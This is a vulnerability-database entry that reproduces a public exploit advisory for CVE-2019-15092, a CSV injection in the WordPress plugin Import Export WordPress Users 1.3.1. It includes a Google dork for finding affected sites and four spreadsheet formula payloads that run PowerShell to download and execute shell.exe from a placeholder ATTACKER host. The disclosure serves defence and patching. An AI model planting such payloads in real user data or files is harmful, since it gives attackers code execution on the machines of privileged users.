Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Import Export WordPress Users 1.3.1 CSV Injection

🗓️ 23 Aug 2019 00:00:00Reported by Javier OlmedoType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 167 Views

WordPress Import Export Users 1.3.1 CSV Injection vulnerability allows remote code execution through CSV files. Affected version: 1.3.1 and before. Patched version: 1.3.2

Related
Code
`# Exploit Title: Wordpress Plugin Import Export WordPress Users <= 1.3.1 - CSV Injection  
# Exploit Author: Javier Olmedo  
# Contact: @jjavierolmedo  
# Website: https://sidertia.com  
# Date: 2018-08-22  
# Google Dork: inurl:"/wp-content/plugins/users-customers-import-export-for-wp-woocommerce"  
# Vendor: WebToffee  
# Software Link: https://downloads.wordpress.org/plugin/users-customers-import-export-for-wp-woocommerce.1.3.1.zip  
# Affected Version: 1.3.1 and before  
# Active installations: +20,000  
# Patched Version: update to 1.3.2 version  
# Category: Web Application  
# Platform: PHP  
# Tested on: Win10x64  
# CVE: 2019-15092  
# References:  
# https://hackpuntes.com/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/  
# https://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787  
  
# 1. Technical Description  
# Wordpress Plugin Import Export WordPress Users version 1.3.1. and before are affected by Remote Code  
# Execution through the CSV injection vulnerability. This allows any application user to inject commands  
# as part of the fields of his profile and these commands are executed when a user with greater privilege   
# exports the data in CSV and opens that file on his machine.  
  
# 2. Vulnerable code  
# The function do_export() from WF_CustomerImpExpCsv_Exporter class does not check if fields beggings  
# with (=, +, -, @) characters so the fields name, surname, alias or display_name are vulnerable to CSV Injection.  
  
# 3. Proof Of Concept (PoC)  
# 3.1 Login with subscriber user and change the fields First name, Surname and Alias with payloads.  
# 3.2 Login with a high privileges user and export all users to CSV.  
# 3.3 When the user with high privileges logs in to the application, export data in CSV and opens the   
# generated file, the command is executed and the shell will run open on the machine.  
  
# 4. Payloads  
=cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0  
+cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0  
-cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0  
@cmd|'/C powershell IEX(wget http://ATTACKER/shell.exe)'!A0  
  
# 5. Timeline  
# 15, august 2019 - [RESEARCHER] Discover  
# 15, august 2019 - [RESEARCHER] Report to Webtoffee support  
# 16, august 2019 - [DEVELOPER] More information request  
# 16, august 2019 - [RESEARCHER] Detailed vulnerability report  
# 19, august 2019 - [DEVELOPER] Unrecognized vulnerability  
# 22, august 2019 - [RESEARCHER] Public disclosure  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Aug 2019 00:00Current
7.2High risk
Vulners AI Score7.2
EPSS0.08413
wordpresscsv injectionremote code executionvulnerabilitywebtoffeephpcve-2019-15092
167